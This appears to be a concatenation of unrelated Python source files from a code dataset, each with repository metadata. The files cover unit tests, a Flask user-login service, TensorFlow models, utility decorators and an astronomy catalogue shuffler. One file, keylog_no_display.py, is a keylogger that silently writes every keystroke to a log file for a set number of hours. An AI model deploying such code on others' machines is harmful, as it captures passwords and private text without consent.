] | null | null | null | Testing/StatusChangerTest.py | crzdg/TrainControlSystem | b75fa98eef7fbbe7b7c9a2ffaade40e8a9346962 | [
"MIT"
] | null | null | null | import StatusChanger.StatusChanger as StatusChanger
from States.States import States
import unittest
class StatusChangerTest(unittest.TestCase):
def test_motor(self):
# start motor, slow
StatusChanger.status_changer(132)
self.assertTrue(States.MOTOR_STARTED)
self.assertTrue(States.MOTOR_SLOW)
self.assertFalse(States.MOTOR_FAST)
# start motor, fast
StatusChanger.status_changer(122)
self.assertTrue(States.MOTOR_STARTED)
self.assertTrue(States.MOTOR_FAST)
self.assertFalse(States.MOTOR_SLOW)
# stop motor
StatusChanger.status_changer(192)
self.assertFalse(States.MOTOR_STARTED)
self.assertFalse(States.MOTOR_FAST)
self.assertFalse(States.MOTOR_SLOW)
def test_crane(self):
# crane loading
StatusChanger.status_changer(211)
self.assertTrue(States.CRANE_LOADING)
self.assertFalse(States.CRANE_LOADED)
# crane loaded
StatusChanger.status_changer(212)
self.assertTrue(States.CRANE_LOADED)
self.assertFalse(States.CRANE_LOADING)
def test_ir1(self):
StatusChanger.status_changer(312)
self.assertTrue(States.IR_1_STARTED)
def test_acceleration(self):
StatusChanger.status_changer(512)
self.assertTrue(States.ACCELERATION_STARTED)
if __name__ == '__main__':
unittest.main() | 30.191489 | 52 | 0.696265 | 153 | 1,419 | 6.228758 | 0.254902 | 0.103882 | 0.167891 | 0.136411 | 0.249738 | 0.202518 | 0.202518 | 0.202518 | 0.119622 | 0 | 0 | 0.020871 | 0.223397 | 1,419 | 47 | 53 | 30.191489 | 0.84392 | 0.051445 | 0 | 0.1875 | 0 | 0 | 0.005966 | 0 | 0 | 0 | 0 | 0 | 0.46875 | 1 | 0.125 | false | 0 | 0.09375 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
5cdcb8f44c6e045cceed885a2032e200b8e88365 | 4,563 | py | Python | modules/User/UserServices.py | Ankush1122/TripIndia | 9e53c7327df872fcae5365a5f78c3f54acbd138d | [
"MIT"
] | 3 | 2022-01-20T06:15:55.000Z | 2022-02-22T11:41:45.000Z | modules/User/UserServices.py | Ankush1122/TripIndia | 9e53c7327df872fcae5365a5f78c3f54acbd138d | [
"MIT"
] | null | null | null | modules/User/UserServices.py | Ankush1122/TripIndia | 9e53c7327df872fcae5365a5f78c3f54acbd138d | [
"MIT"
] | 1 | 2022-03-11T01:24:44.000Z | 2022-03-11T01:24:44.000Z | from flask import session
from User import UserRepo
import bcrypt
from datetime import date
class UserServices:
def __init__(self, db) -> None:
self.db = UserRepo.Repo(db)
def login(self, user):
if('@' not in user.userid or len(user.userid) < 3):
return [False, "Invalid Email"]
if(len(user.password) < 6):
return [False, "Incorrect Username or Password"]
userData = self.db.getUserById(user.userid)
if (userData[0]):
if (bcrypt.checkpw(str(user.password).encode('utf-8'), str(userData[1].password).encode('utf-8'))):
return userData
else:
return [False, "Incorrect Username or Password"]
else:
return [False, "User Does Not Exists, try signing up"]
def register(self, user):
if (self.db.isUserIdUsed(user.userid)):
print("user id already used")
return [False, "Email already registered"]
hashed = bcrypt.hashpw(
str(user.password).encode('utf-8'), bcrypt.gensalt())
user.password = hashed.decode()
if (self.db.addUser(user)):
print("user added successfully")
return [True, "Added User Successfully"]
else:
return [False, "Database Error"]
def validateData(self, name, email, password, confirmpassword, DOB, country):
if(name == "" or email == "" or password == "" or confirmpassword == "" or DOB == "" or country == ""):
return [False, "Please Fill all the Fields"]
if(" " not in name):
return [False, "Please Enter Full Name"]
if('@' not in email or len(email) < 3):
return [False, "Invalid Email Address"]
if(password != confirmpassword):
return [False, "Confirm password did not match"]
if(len(password) < 6):
return [False, "Password should consist of atleast 6 characters"]
return [True, "Valid Data"]
def activateUser(self, userid, verification):
self.db.updateUserVerificationStatus(userid, verification)
def signout(self):
print("signing out")
session.pop("index", None)
def getUserSession(self, index):
userData = self.db.getUserByIndex(index)
if (userData[0]):
print("session retrived successfully")
else:
self.signout()
return userData
def editProfile(self, user):
userData = self.db.getUserById(user.userid)
if(userData[0]):
if (bcrypt.checkpw(str(user.password).encode('utf-8'), str(userData[1].password).encode('utf-8'))):
user.password = userData[1].password
self.db.updateUserProfile(user)
return [True, "Profile Updated Succesfully"]
else:
return [False, "Incorrect password"]
else:
return [False, "User does not exist"]
def changePassword(self, currentpassword, newpassword, confirmpassword, userid):
if(newpassword != confirmpassword):
return [False, "Confirm password did not match"]
userData = self.db.getUserById(userid)
if(userData[0]):
if (bcrypt.checkpw(str(currentpassword).encode('utf-8'), str(userData[1].password).encode('utf-8'))):
hashed = bcrypt.hashpw(
str(newpassword).encode('utf-8'), bcrypt.gensalt())
self.db.updateUserPassword(hashed.decode(), userid)
return [True, "Password updated succesfully"]
else:
return [False, "Incorrect Current password"]
else:
return [False, "User does not exist"]
def addUserLog(self, userid, currenttime, success):
self.db.addUserLog(userid, currenttime, success)
def getUserName(self, userid):
userData = self.db.getUserById(userid)
return userData[1].name
def addView(self):
today = date.today()
dateToday = today.strftime("%b-%d-%Y")
userData = self.db.getVisitsByDate(dateToday)
if(userData[0]):
self.db.updateVisitsByDate(dateToday, userData[1] + 1)
else:
self.db.addDateToVisitsTable(dateToday)
def getTotalVisits(self):
data = self.db.getTotalVisits()
if(data[0]):
return data[1]
else:
return 0
def getNumberOfUsers(self):
data = self.db.getNumberOfUsers()
if(data[0]):
return data[1]
else:
return 0
| 36.214286 | 113 | 0.582731 | 490 | 4,563 | 5.418367 | 0.255102 | 0.040678 | 0.030132 | 0.040678 | 0.34049 | 0.287759 | 0.221092 | 0.208286 | 0.155932 | 0.102448 | 0 | 0.009645 | 0.295639 | 4,563 | 125 | 114 | 36.504 | 0.816428 | 0 | 0 | 0.358491 | 0 | 0 | 0.138505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.132075 | false | 0.216981 | 0.037736 | 0 | 0.433962 | 0.037736 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
5cdfd7e1aeaff8d47ea33c610cb3c43f0e69f60b | 1,216 | py | Python | keylog_no_display.py | Reyogin/py-keylogger | 74d481864d2be8feafa19b1c3d533566326cda2d | [
"MIT"
] | null | null | null | keylog_no_display.py | Reyogin/py-keylogger | 74d481864d2be8feafa19b1c3d533566326cda2d | [
"MIT"
] | null | null | null | keylog_no_display.py | Reyogin/py-keylogger | 74d481864d2be8feafa19b1c3d533566326cda2d | [
"MIT"
] | null | null | null | from pynput.keyboard import Key, Listener
import logging
import datetime
import sys
log_file='/home/bertrand/Desktop/file_no_display.log'
logging.basicConfig(filename=log_file, level=logging.DEBUG, format='%(message)s')
message = ""
# stop = False
def on_press(key):
global message
if (hasattr(key, 'name')):
if key.name == 'space':
message += " "
elif key.name == 'enter':
#if key pressed is enter
logging.info(message)
if message == "end session":
exit(0)
message = ""
elif key.name == 'backspacet':
message = message[:-1]
else:
#TODO : handle ctrl and alt
logging.info(message)
logging.info(key.name)
message = ""
else:
if not key.char and key.vk == 65027:
return
message += key.char
def main(time):
start = datetime.datetime.now()
duration = datetime.timedelta(hours=int(time))
end = start + duration
current = datetime.datetime.now()
listener = Listener(on_press=on_press)
listener.start()
while current != end:
current = datetime.datetime.now()
main(sys.argv[1]) | 27.636364 | 81 | 0.583059 | 142 | 1,216 | 4.943662 | 0.464789 | 0.049858 | 0.081197 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009368 | 0.297697 | 1,216 | 44 | 82 | 27.636364 | 0.812646 | 0.050164 | 0 | 0.243243 | 0 | 0 | 0.077257 | 0.036458 | 0 | 0 | 0 | 0.022727 | 0 | 1 | 0.054054 | false | 0 | 0.108108 | 0 | 0.189189 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a2548562ee5c125b5c6d758d30c09322862af85 | 1,989 | py | Python | tests/helpers/examples/failure_reasons/__init__.py | proofit404/userstories | aebfc088c8b7aab80a227e48e29be638411ffd86 | [
"BSD-2-Clause"
] | 187 | 2018-06-13T09:13:32.000Z | 2020-05-28T05:02:23.000Z | tests/helpers/examples/failure_reasons/__init__.py | supadrupa/stories | 3f1de66eae1216888eb5a7d2951013b8bbb4da25 | [
"BSD-2-Clause"
] | 426 | 2018-04-02T14:12:31.000Z | 2021-12-14T05:13:45.000Z | tests/helpers/examples/failure_reasons/__init__.py | proofit404/userstories | aebfc088c8b7aab80a227e48e29be638411ffd86 | [
"BSD-2-Clause"
] | 15 | 2018-11-03T09:03:38.000Z | 2020-05-10T17:16:47.000Z | from enum import Enum
from stories import story
# Base classes.
class ChildWithNull:
@story
def x(I):
I.one
class NextChildWithNull:
@story
def y(I):
I.two
class ParentWithNull:
@story
def a(I):
I.before
I.x
I.after
class SequenceParentWithNull:
@story
def a(I):
I.before
I.x
I.y
I.after
class ChildWithList:
@story
def x(I):
I.one
ChildWithList.x.failures(["foo", "bar", "baz"])
class NextChildWithList:
@story
def y(I):
I.two
NextChildWithList.y.failures(["spam", "ham", "eggs"])
class ParentWithList:
@story
def a(I):
I.before
I.x
I.after
ParentWithList.a.failures(["foo", "bar", "baz"])
class WideParentWithList:
@story
def a(I):
I.before
I.x
I.after
WideParentWithList.a.failures(["foo", "bar", "baz", "quiz"])
class ShrinkParentWithList:
@story
def a(I):
I.before
I.x
I.after
ShrinkParentWithList.a.failures(["foo", "quiz"])
class ChildWithEnum:
@story
def x(I):
I.one
@x.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class NextChildWithEnum:
@story
def y(I):
I.two
@y.failures
class Errors(Enum):
spam = 1
ham = 2
eggs = 3
class ParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ParentWithEnum.a.failures
class Errors(Enum):
foo = 1
bar = 2
baz = 3
class WideParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@WideParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
bar = 2
baz = 3
quiz = 4
class ShrinkParentWithEnum:
@story
def a(I):
I.before
I.x
I.after
@ShrinkParentWithEnum.a.failures
class Errors(Enum): # noqa: F811
foo = 1
quiz = 4
| 12.75 | 60 | 0.535445 | 248 | 1,989 | 4.294355 | 0.185484 | 0.105164 | 0.067606 | 0.075117 | 0.4723 | 0.412207 | 0.325822 | 0.325822 | 0.325822 | 0.239437 | 0 | 0.016342 | 0.353947 | 1,989 | 155 | 61 | 12.832258 | 0.812451 | 0.017597 | 0 | 0.714286 | 0 | 0 | 0.025128 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.019048 | 0 | 0.419048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a2d91a2be0463ad110f4e50fcc81532e82c1deb | 2,401 | py | Python | python/multi_view_learning/nn_leaveOneOut.py | thekingofkings/chicago-crime | 30550697402aa3a5a074096a0032b0c1e1264313 | [
"MIT"
] | 10 | 2016-11-08T04:31:06.000Z | 2021-07-28T15:17:52.000Z | python/multi_view_learning/nn_leaveOneOut.py | thekingofkings/chicago-crime | 30550697402aa3a5a074096a0032b0c1e1264313 | [
"MIT"
] | 24 | 2016-04-19T15:07:52.000Z | 2017-05-20T02:29:23.000Z | python/multi_view_learning/nn_leaveOneOut.py | thekingofkings/urban-flow-analysis | 30550697402aa3a5a074096a0032b0c1e1264313 | [
"MIT"
] | 5 | 2016-09-13T21:13:46.000Z | 2019-12-04T11:40:02.000Z | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Tensor flow NN model for leave-one-out evaluation.
Created on Fri Apr 7 14:25:01 2017
@author: hxw186
"""
import tensorflow as tf
import numpy as np
import sys
sys.path.append("../")
from feature_evaluation import build_features
def leaveOneOut_error(Y, D, P, Tf, Yt, Gd, Yg, features=['all'], gwr_gamma=None, taxi_norm="bydestination"):
"""
Use GLM model from python statsmodels library to fit data.
Evaluate with leave-one-out setting, return the average of n errors.
Input:
features - a list features. ['all'] == ['demo', 'poi', 'geo', 'taxi']
gwr_gamma - the GWR weight matrx. TODO
Output:
error - the average error of k leave-one-out evaluation
"""
errors = []
for k in range(len(Y)):
with tf.Graph().as_default():
X_train, X_test, Y_train, Y_test = build_features(Y, D, P, Tf, Yt, Gd, Yg, k, features, taxi_norm)
# build the TF nn model
F1 = X_train.shape[1]
x1 = tf.placeholder(tf.float32, [None, F1], name="numeric_features_set1")
y = tf.placeholder(tf.float32, [None, 1], name="label")
W = tf.Variable(tf.random_normal([F1]), name="weight")
b = tf.Variable(tf.random_normal([1]), name="bias")
y_est = tf.add(tf.reduce_sum(tf.multiply(x1, W)), b)
# h1 = tf.layers.dense(inputs=x1, units=F1/2, activation=tf.nn.relu, use_bias=True,
# name="reduce_half", reuse=None)
# y_est = tf.layers.dense(inputs=x1, units=1, activation=None, use_bias=True,
# name="reg_pred", reuse=None)
objective = tf.reduce_mean(tf.squared_difference(y, y_est))
train_step = tf.train.GradientDescentOptimizer(0.1).minimize(objective)
tf_mae = tf.reduce_mean(tf.abs(y - y_est))
sess = tf.InteractiveSession()
sess.run(tf.global_variables_initializer())
train_step.run(feed_dict={x1: X_train, y: Y_train[:,None]})
yarray = np.array(Y_test).reshape((1,1))
mae = tf_mae.eval(feed_dict={x1: X_test[None,:], y: yarray})
errors.append(mae)
return np.mean(errors), np.mean(errors) / np.mean(Y)
| 34.3 | 110 | 0.573928 | 330 | 2,401 | 4.048485 | 0.448485 | 0.011976 | 0.024701 | 0.031437 | 0.152695 | 0.055389 | 0.016467 | 0 | 0 | 0 | 0 | 0.024089 | 0.291129 | 2,401 | 69 | 111 | 34.797101 | 0.76087 | 0.329863 | 0 | 0 | 0 | 0 | 0.035438 | 0.013531 | 0 | 0 | 0 | 0.014493 | 0 | 1 | 0.038462 | false | 0 | 0.153846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a35bf0f4d9cc0c9d167afdd16979f69be3ead4a | 401 | py | Python | {{ cookiecutter.repo_name }}/{{cookiecutter.source_name}}/core/mixins/pickle_mixin.py | IngerMathilde/cookiecutter-data-science-dev | f0bec56aaf5b6b74b56241be47356fec957e34dc | [
"MIT"
] | 1 | 2022-01-18T22:52:10.000Z | 2022-01-18T22:52:10.000Z | {{ cookiecutter.repo_name }}/{{cookiecutter.source_name}}/core/mixins/pickle_mixin.py | IngerMathilde/cookiecutter-data-science-poetry-docker-makefile | f0bec56aaf5b6b74b56241be47356fec957e34dc | [
"MIT"
] | null | null | null | {{ cookiecutter.repo_name }}/{{cookiecutter.source_name}}/core/mixins/pickle_mixin.py | IngerMathilde/cookiecutter-data-science-poetry-docker-makefile | f0bec56aaf5b6b74b56241be47356fec957e34dc | [
"MIT"
] | null | null | null | import gzip
import pickle
class PickableMixin:
"""A mixins to make a class a pickable object"""
def dump(self, file_name: str) -> None:
with open('{}.pkl'.format(file_name), 'wb') as f:
pickle.dump(self, f)
@classmethod
def load(cls, file_name: str) -> 'PickableMixin':
with open('{}.pkl'.format(file_name), 'rb') as f:
return pickle.load(f)
| 26.733333 | 57 | 0.600998 | 56 | 401 | 4.232143 | 0.535714 | 0.135021 | 0.092827 | 0.14346 | 0.21097 | 0.21097 | 0 | 0 | 0 | 0 | 0 | 0 | 0.25187 | 401 | 14 | 58 | 28.642857 | 0.79 | 0.104738 | 0 | 0 | 0 | 0 | 0.082153 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7a4859bc53bbe4a3b3dcad56a45d683fde79184d | 246 | py | Python | tests/runner/test_bobo3_profile.py | andyfase/awscfncli | 467297a93b74ac094202af980140f93b531800fd | [
"MIT"
] | 60 | 2017-01-16T09:52:36.000Z | 2021-09-07T23:27:01.000Z | tests/runner/test_bobo3_profile.py | andyfase/awscfncli | 467297a93b74ac094202af980140f93b531800fd | [
"MIT"
] | 103 | 2017-08-22T17:01:31.000Z | 2021-09-02T15:32:34.000Z | tests/runner/test_bobo3_profile.py | andyfase/awscfncli | 467297a93b74ac094202af980140f93b531800fd | [
"MIT"
] | 16 | 2017-08-22T16:24:11.000Z | 2021-06-30T11:45:51.000Z | from awscfncli2.runner import Boto3Profile
class TestStackSelector(object):
def test_update(self):
s1 = Boto3Profile('foo','bar')
s2 = Boto3Profile('foo', 'baz')
assert s1.region_name == 'bar'
s1.update(s2)
| 22.363636 | 42 | 0.634146 | 28 | 246 | 5.5 | 0.714286 | 0.194805 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.048128 | 0.239837 | 246 | 10 | 43 | 24.6 | 0.775401 | 0 | 0 | 0 | 0 | 0 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a53b57a7b74cbdc2de72cbc43f9edd1ac439064 | 5,251 | py | Python | mnist_TF_layers.py | hughkong/asstarer | ed331aa2b4c7665f10214117510cfee099216ede | [
"Apache-2.0"
] | 1 | 2021-06-20T11:44:05.000Z | 2021-06-20T11:44:05.000Z | mnist_TF_layers.py | hughkong/asstarer | ed331aa2b4c7665f10214117510cfee099216ede | [
"Apache-2.0"
] | null | null | null | mnist_TF_layers.py | hughkong/asstarer | ed331aa2b4c7665f10214117510cfee099216ede | [
"Apache-2.0"
] | 2 | 2020-04-12T10:52:11.000Z | 2021-02-23T14:06:58.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from tensorflow.contrib import learn
from tensorflow.contrib import layers
from tensorflow.contrib import metrics
from tensorflow.contrib import framework
from tensorflow.contrib.learn import MetricSpec
from tensorflow.python.platform import tf_logging as logging
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
import math
from mlengine.digits import test_digits
logging.set_verbosity(logging.INFO)
# This sample shows how to write Tensorflow models using the high-level layers API
# in Tensorflow. Using high-level APIs, you do not have to define placeholders and
# variables yourself. Also, you will not need to write your own training loop by
# using the Estimator interface instead.
#
# WARNING: tensorflow.contrib.learn.* APIs are still experimental and can change in breaking ways
# as they mature. API stability will be ensured when tensorflow.contrib.learn becomes tensorflow.learn
# Download images and labels into mnist.test (10K images+labels) and mnist.train (60K images+labels)
mnist = read_data_sets("data", one_hot=False, reshape=True, validation_size=0)
# In memory training data for this simple case.
# When data is too large to fit in memory, use Tensorflow queues.
def train_data_input_fn():
return tf.train.shuffle_batch([tf.constant(mnist.train.images), tf.constant(mnist.train.labels)],
batch_size=100, capacity=1100, min_after_dequeue=1000, enqueue_many=True)
# Eval data is an in-memory constant here.
def eval_data_input_fn():
return tf.constant(mnist.test.images), tf.constant(mnist.test.labels)
# Test data for a predictions run
def predict_input_fn():
    """Prediction input: the bundled test digits as a float32 constant."""
    digit_batch = tf.constant(test_digits)
    return tf.cast(digit_batch, tf.float32)
# Model loss (not needed in INFER mode)
def conv_model_loss(Ylogits, Y_, mode):
    """Softmax cross-entropy loss scaled by 100; None in INFER mode."""
    if mode not in (learn.ModeKeys.TRAIN, learn.ModeKeys.EVAL):
        return None
    cross_entropy = tf.nn.softmax_cross_entropy_with_logits(
        logits=Ylogits, labels=tf.one_hot(Y_, 10))
    return tf.reduce_mean(cross_entropy) * 100
# Model optimiser (only needed in TRAIN mode)
def conv_model_train_op(loss, mode):
    """Adam training op with exponential learning-rate decay; None unless TRAIN."""
    if mode != learn.ModeKeys.TRAIN:
        return None

    # to remove learning rate decay, drop the learning_rate_decay_fn argument
    def decayed_lr(lr, step):
        return 0.0001 + tf.train.exponential_decay(lr, step, -2000, math.e)

    return layers.optimize_loss(loss, framework.get_global_step(),
                                learning_rate=0.003, optimizer="Adam",
                                learning_rate_decay_fn=decayed_lr)
# Model evaluation metric (not needed in INFER mode)
def conv_model_eval_metrics(classes, Y_, mode):
    """Accuracy metric dict for TRAIN/EVAL; None in INFER mode."""
    if mode not in (learn.ModeKeys.TRAIN, learn.ModeKeys.EVAL):
        return None
    # You can name the fields of your metrics dictionary as you like.
    return {'accuracy': metrics.accuracy(classes, Y_)}
# Model
def conv_model(X, Y_, mode):
    """Model function: three conv layers, a 200-unit dense layer with dropout,
    and a 10-way softmax readout. Returns a ModelFnOps for the Estimator."""
    images = tf.reshape(X, [-1, 28, 28, 1])
    bias_init = tf.constant_initializer(0.1, dtype=tf.float32)
    conv1 = layers.conv2d(images, num_outputs=6, kernel_size=[6, 6],
                          biases_initializer=bias_init)
    conv2 = layers.conv2d(conv1, num_outputs=12, kernel_size=[5, 5], stride=2,
                          biases_initializer=bias_init)
    conv3 = layers.conv2d(conv2, num_outputs=24, kernel_size=[4, 4], stride=2,
                          biases_initializer=bias_init)
    flattened = layers.flatten(conv3)
    dense = layers.relu(flattened, 200, biases_initializer=bias_init)
    # to deactivate dropout on the dense layer, set keep_prob=1
    dense_dropout = layers.dropout(dense, keep_prob=0.75, noise_shape=None,
                                   is_training=(mode == learn.ModeKeys.TRAIN))
    Ylogits = layers.linear(dense_dropout, 10)
    predict = tf.nn.softmax(Ylogits)
    classes = tf.cast(tf.argmax(predict, 1), tf.uint8)

    loss = conv_model_loss(Ylogits, Y_, mode)
    train_op = conv_model_train_op(loss, mode)
    eval_metrics = conv_model_eval_metrics(classes, Y_, mode)
    # You can name the fields of your predictions dictionary as you like.
    return learn.ModelFnOps(
        mode=mode,
        predictions={"predictions": predict, "classes": classes},
        loss=loss,
        train_op=train_op,
        eval_metric_ops=eval_metrics
    )
# Configuration to save a checkpoint every 1000 steps.
training_config = tf.contrib.learn.RunConfig(save_checkpoints_secs=None, save_checkpoints_steps=1000, gpu_memory_fraction=0.9)
# The Estimator wires the model function to checkpointing and the training loop.
estimator=learn.Estimator(model_fn=conv_model, model_dir="checkpoints", config=training_config)
# Trains for 10000 additional steps saving checkpoints on a regular basis. The next
# training will resume from the checkpoint unless you delete the "checkpoints" folder.
estimator.fit(input_fn=train_data_input_fn, steps=10000)
# One evaluation pass over the in-memory test set.
estimator.evaluate(input_fn=eval_data_input_fn, steps=1)
# Run inference on the bundled test digits; each prediction dict carries the
# "classes" and "predictions" fields defined in conv_model.
digits = estimator.predict(input_fn=predict_input_fn)
for digit in digits:
    print(str(digit['classes']), str(digit['predictions']))
7a5631563abbee09e3dc6aba4770d276955ccd69 | 1,018 | py | Python | utils.py | yinziyan1206/nado_unit | 1b4f7ebbcbff05c8feafe1abbb9bd26fc1e3e75a | [
"MIT"
] | null | null | null | utils.py | yinziyan1206/nado_unit | 1b4f7ebbcbff05c8feafe1abbb9bd26fc1e3e75a | [
"MIT"
] | null | null | null | utils.py | yinziyan1206/nado_unit | 1b4f7ebbcbff05c8feafe1abbb9bd26fc1e3e75a | [
"MIT"
] | null | null | null | #!/usr/bin/python3
__author__ = 'ziyan.yin'
from threading import Lock
from typing import Dict
from .unit import units
locks: Dict[str, Lock] = dict()


def synchronized(func):
    """Decorate *func* so that concurrent calls are serialized by a lock.

    One Lock per decorated function, created at decoration time and stored in
    the module-level ``locks`` table keyed by ``repr(func)``.
    """
    import functools  # local import keeps this fix self-contained

    # repr(func) is already a str; the original wrapped it in a redundant f-string.
    key = repr(func)
    if key not in locks:
        locks[key] = Lock()

    @functools.wraps(func)  # preserve __name__/__doc__ of the wrapped function
    def wrapper(*args, **kwargs):
        with locks[key]:
            return func(*args, **kwargs)
    return wrapper
def register(cls):
    """Register *cls* in the global units table, keyed by its trimmed module path."""
    # Drop the top-level package name from the module path.
    module = '.'.join(cls.__module__.split('.')[1:])
    units.setdefault(module, dict())[cls.__name__] = cls
    return cls
def priority(level: int):
    """Class decorator factory: sets ``cls.level``.

    Valid levels are 1..4; any level outside (0 < level < 5) falls back to 1.
    """
    effective = level if 0 < level < 5 else 1

    def decorate(cls):
        cls.level = effective
        return cls
    return decorate
def get_unit(router: str = 'common', method: str = ''):
    """Resolve a registered unit class.

    Returns (True, cls) on success, (False, error_message) when the lookup
    fails, and (False, '') when router is empty.
    """
    if not router:
        return False, ''
    router_units = units.get(router)
    if router_units is not None and method in router_units:
        return True, router_units[method]
    return False, 'can not find service {0}[{1}]'.format(router, method)
| 20.36 | 80 | 0.590373 | 134 | 1,018 | 4.38806 | 0.402985 | 0.035714 | 0.054422 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00955 | 0.279961 | 1,018 | 49 | 81 | 20.77551 | 0.792633 | 0.016699 | 0 | 0.121212 | 0 | 0 | 0.058 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.515152 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7a565900a54a138a678990c731ee449abfbb87b7 | 7,107 | py | Python | code/satellite_shuffler.py | mjvakili/gambly | 611765bc42d8c42d76558b486c4025532155036a | [
"MIT"
] | 1 | 2016-01-29T20:57:07.000Z | 2016-01-29T20:57:07.000Z | code/satellite_shuffler.py | mjvakili/Gamble | 611765bc42d8c42d76558b486c4025532155036a | [
"MIT"
] | 2 | 2017-03-06T17:55:39.000Z | 2018-10-11T16:15:01.000Z | code/satellite_shuffler.py | mjvakili/Gamble | 611765bc42d8c42d76558b486c4025532155036a | [
"MIT"
] | null | null | null | '''
This is copied from Duncan Campbell's
galactic conformity repo:
https://github.com/duncandc/galactic_conformity/blob/d34499507558d90c68e50adb559aa3671d1cc420/mock/shuffling/make_satrel_shuffle_hearin_mocks.py
'''
import numpy as np
import h5py
import sys
from astropy.io import ascii
from astropy import table
def main(Mr, sham_style):
    """Shuffle satellite galaxies among host haloes of similar mass.

    Loads a SHAM mock catalogue (hdf5), reassigns every satellite to a random
    central within the same host-mass bin (keeping galaxy properties, swapping
    halo properties and recentering positions/velocities), and writes the
    shuffled catalogue back out in hdf5 and ascii form.

    NOTE(review): if sham_style is neither "tailored" nor "Vpeak", `catalogue`
    is never bound and a NameError follows -- confirm whether an explicit
    error is wanted.
    """
    #location of data directory
    filepath = '/export/bbq2/mj/'
    savepath = '/export/bbq2/mj/'
    if sham_style == "tailored":
        catalogue = 'bolshoi_new_a1.00231.mag_r.source_blanton.scatter0.17.tailored_Mr'+str(Mr)
    elif sham_style == "Vpeak":
        # NOTE(review): 'Vpeaj' looks like a typo for 'Vpeak' -- confirm
        # against the files actually on disk before renaming.
        catalogue = 'bolshoi_new_a1.00231.mag_r.source_blanton.scatter0.15.Vpeaj_Mr'+str(Mr)
    f = h5py.File(filepath+catalogue+'.hdf5', 'r')
    GC = f.get("data")
    GC = np.array(GC)
    #make new catalogue and copy over values from original catalogue
    dtype = GC.dtype.descr
    dtype = np.dtype(dtype)
    GC_new = np.recarray((len(GC),), dtype=dtype)
    GC_new.fill(0.0)
    GC_new = np.array(GC, copy=True)
    #identify central galaxies, host haloes
    centrals = np.where(GC['upid'] == -1)[0] #indices of the central galaxies
    print 'number of centrals, host haloes:', len(centrals)
    satellites = np.where(GC['upid'] != -1)[0] #indices of the satellite galaxies
    print 'number of satellites, host haloes:', len(satellites)
    #define mass bins, and which central are in each mass bin
    mass_bins = np.arange(8.0,16.0,0.1) #log mass bins
    mass_hist, bins = np.histogram(GC['host_mass'][centrals], bins=mass_bins) #group histogram by log(host_mass)
